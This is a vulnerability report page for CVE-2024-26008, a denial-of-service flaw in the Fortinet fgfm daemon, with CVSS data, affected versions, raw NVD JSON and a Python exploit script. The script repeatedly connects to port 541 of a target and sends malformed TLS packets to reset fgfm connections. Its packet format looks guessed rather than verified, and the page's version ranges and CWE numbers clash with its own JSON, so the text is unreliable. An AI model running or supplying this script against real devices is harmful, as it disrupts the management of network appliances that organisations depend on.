Security Vulnerability Report
CVE-2024-26008 CVSS 5.3 MEDIUM

CVE-2024-26008

Published: 2025-10-14 16:15:35
Last Modified: 2025-10-15 17:39:47

Description

An improper check or handling of exceptional conditions vulnerability [CWE-703] in FortiOS version 7.4.0 through 7.4.3 and before 7.2.7, FortiProxy version 7.4.0 through 7.4.3 and before 7.2.9, FortiPAM before 1.2.0 and FortiSwitchManager version 7.2.0 through 7.2.3 and version 7.0.0 through 7.0.3 fgfm daemon may allow an unauthenticated attacker to repeatedly reset the fgfm connection via crafted SSL encrypted TCP requests.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:* - VULNERABLE
FortiOS 7.4.0 - 7.4.3
FortiOS < 7.2.7
FortiProxy 7.4.0 - 7.4.3
FortiProxy < 7.2.9
FortiPAM < 1.2.0
FortiSwitchManager 7.2.0 - 7.2.3
FortiSwitchManager 7.0.0 - 7.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-26008 PoC - Fortinet fgfm daemon DoS via crafted SSL TCP requests
# This PoC demonstrates the vulnerability by repeatedly sending malformed
# SSL/TLS encrypted TCP packets to the fgfm daemon port to trigger connection resets.

import socket
import ssl
import struct
import time

TARGET_HOST = "192.168.1.1"  # Target Fortinet device IP
TARGET_PORT = 541            # Default fgfm daemon port
NUM_REQUESTS = 100           # Number of malicious requests to send
DELAY = 0.1                  # Delay between requests (seconds)


def craft_malformed_ssl_packet():
    """
    Craft a malformed SSL/TLS ClientHello-like packet
    to trigger the exception handling flaw in the fgfm daemon.
    """
    # TLS record header: ContentType(1) + Version(2) + Length(2)
    # ContentType 0x16 = Handshake, Version 0x0301 = TLS 1.0
    content_type = b'\x16'
    tls_version = b'\x03\x01'

    # Malformed handshake payload with corrupted length field
    # HandshakeType 0x01 = ClientHello
    handshake_type = b'\x01'
    # Intentionally corrupted length to trigger exception handling bug
    malformed_length = b'\xff\xff'
    # Random garbage data to fill the payload
    payload = b'\x00' * 32

    handshake = handshake_type + malformed_length + payload
    length = struct.pack('>H', len(handshake))

    return content_type + tls_version + length + handshake


def exploit():
    """
    Main exploit function: sends crafted SSL packets to repeatedly
    reset the fgfm connection, causing denial of service.
    """
    print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}")
    print(f"[*] Sending {NUM_REQUESTS} crafted SSL requests...")

    for i in range(NUM_REQUESTS):
        try:
            # Create raw TCP socket
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((TARGET_HOST, TARGET_PORT))

            # Send malformed SSL/TLS packet
            packet = craft_malformed_ssl_packet()
            sock.send(packet)

            # Attempt to receive response (will likely fail due to reset)
            try:
                response = sock.recv(1024)
                print(f"[+] Request {i+1}: Response received ({len(response)} bytes)")
            except socket.timeout:
                print(f"[+] Request {i+1}: Connection timed out (possible reset)")
            except ConnectionResetError:
                print(f"[+] Request {i+1}: Connection reset by target!")

            sock.close()
        except Exception as e:
            print(f"[-] Request {i+1}: Error - {e}")

        time.sleep(DELAY)

    print(f"[*] Attack completed. {NUM_REQUESTS} requests sent.")
    print("[*] The fgfm connection should have been repeatedly reset.")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-26008", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:34.783", "lastModified": "2025-10-15T17:39:47.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper check or handling of exceptional conditions vulnerability [CWE-703] in FortiOS version 7.4.0 through 7.4.3 and before 7.2.7, FortiProxy version 7.4.0 through 7.4.3 and before 7.2.9, FortiPAM before 1.2.0 and FortiSwitchManager version 7.2.0 through 7.2.3 and version 7.0.0 through 7.0.3 fgfm daemon may allow an unauthenticated attacker to repeatedly reset the fgfm connection via crafted SSL encrypted TCP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.2.8", "matchCriteriaId": "849D41D5-DBB6-4E77-B1F0-C71016531127"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "1FDDB5F3-D229-4208-9110-8860A03C8B59"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.3.0", 
"matchCriteriaId": "18427F16-7339-4A9E-9FA4-EC7A2D3EE218"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "7.2.10", "matchCriteriaId": "85405C4E-811B-4773-BD2A-45F709B60A98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "3F2C29AD-A11F-4A5F-8BB0-8600D5F77E72"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.4", "matchCriteriaId": "7A020C2E-1DDB-4737-92D9-B125FFBE007A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.4", "matchCriteriaId": "EB0D2553-E4E6-454A-80F6-9D014A4710D3"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-041", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}